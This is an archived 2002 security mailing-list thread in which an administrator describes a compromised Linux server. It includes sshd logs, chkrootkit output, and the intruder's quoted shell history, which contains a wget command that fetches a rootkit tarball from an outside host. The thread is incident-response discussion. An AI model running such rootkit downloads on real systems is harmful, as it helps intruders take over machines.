we used linux 2.4.7-10. we only opened ports 21 (ftp), 22 (ssh), and 443 (https). 21 - wu-ftpd-2.6.1-20 22 - openssh-3.1 443 - tomcat-3.2.4 1. this is the content of /home/war's .bash_history: wget wget http://mrunix.free.fr/roy/w00tkit.tgz logout 2. he was trying to send a mail to himself regarding the system's resources: The original message was received at Thu, 5 Sep 2002 22:21:37 +0800 from root@localhost ----- The following addresses had permanent fatal errors ----- roi_blablaat_private (reason: 501 5.1.8 Sender domain must exist) ----- Transcript of session follows ----- ... while talking to rmail.walla.co.il.: >>> MAIL From:<rootat_private> SIZE=2283 <<< 501 5.1.8 Sender domain must exist 501 5.6.0 Data format error 3. walla.co.il is in israel 4. tracing 212.179.207.211 gives israel also. i have moved the files to another machine and reinstalled the server 'cause we need to put it up and running asap. do u think the exploit was done thru ftp? can u help me replicate it? i was looking for procedures or scripts in ssh/ftp exploits so that i can try to attack our server but i can not find any. --- Loki <lokiat_private> wrote: > What version of SSHD were you running, check > commonly exploited > services. > > 1. SSHD (crc32) > 2. FTPD > 3. Apache (chunking) > > Get back to us with the versions you were running of > SSH, FTP, and > Apache and we can help you out. How hardened was the > OS? Did you turn > off all RPC services, etc. We need more info. > > Eric/Loki > Internet Warfare and Intelligence > Fate Research Labs > www.fatelabs.com > > > > > > > > > > > > > > > > > > -----Original Message----- > From: Ver Allan Sumabat [mailto:ver_allanat_private] > > Sent: Tuesday, September 10, 2002 6:08 AM > To: incidentsat_private > Subject: possible ssh hack > > > Hi, > > We have just recently been hacked. I have no idea > how > he came in. Here are my preliminary investigations: > > 1. He was able to add a user without logging in. > > **Unmatched Entries** > Sep 5 10:39:33 srv1 sshd[20514]: Could not reverse > map address 10.13.41.4. > Sep 5 10:39:35 srv1 sshd[20514]: Accepted password > for root from 10.13.41.4 > port 4207 > Sep 5 17:30:36 srv1 sshd[23299]: Could not reverse > map address 10.13.41.4. > Sep 5 17:30:41 srv1 sshd[23299]: Accepted password > for root from 10.13.41.4 > port 2491 > Sep 5 22:16:59 srv1 useradd[23532]: new group: > name=war, gid=502 > Sep 5 22:16:59 srv1 useradd[23532]: new user: > name=war, uid=502, gid=502, > home=/home/war, shell=/bin/bash > Sep 5 22:17:31 srv1 sshd[23534]: Accepted password > for war from > 212.179.207.211 port 2746 > Sep 5 22:19:17 srv1 sshd[23580]: fatal: Read from > socket failed: Connection > reset by peer > Sep 5 22:21:48 srv1 sshd[928]: Received SIGHUP; > restarting. > > > 2. He installed a tarball w00tkit.tgz in /home/war > > 3. After running chkrootkit, the significant lines > are: > > ... > Checking `ifconfig'... INFECTED > ... > Searching for Showtee... Warning: Possible Showtee > Rootkit installed > ... > Checking `lkm'... You have 1 process hidden for > ps > command > Warning: Possible LKM Trojan installed > > 4. ssh won't run anymore > > Can anyone help me on how the intrusion was done? > > Thanks. > > Regards, > > Allan > > __________________________________________________ > Yahoo! - We Remember > 9-11: A tribute to the more than 3,000 lives lost > http://dir.remember.yahoo.com/tribute > > ------------------------------------------------------------------------ > ---- > This list is provided by the SecurityFocus ARIS > analyzer service. For > more information on this free incident handling, > management > and tracking system please see: > http://aris.securityfocus.com > > > ---------------------------------------------------------------------------- > This list is provided by the SecurityFocus ARIS > analyzer service. > For more information on this free incident handling, > management > and tracking system please see: > http://aris.securityfocus.com > __________________________________________________ Do you Yahoo!? Yahoo! News - Today's headlines http://news.yahoo.com ---------------------------------------------------------------------------- This list is provided by the SecurityFocus ARIS analyzer service. For more information on this free incident handling, management and tracking system please see: http://aris.securityfocus.com
This archive was generated by hypermail 2b30 : Wed Sep 11 2002 - 21:10:22 PDT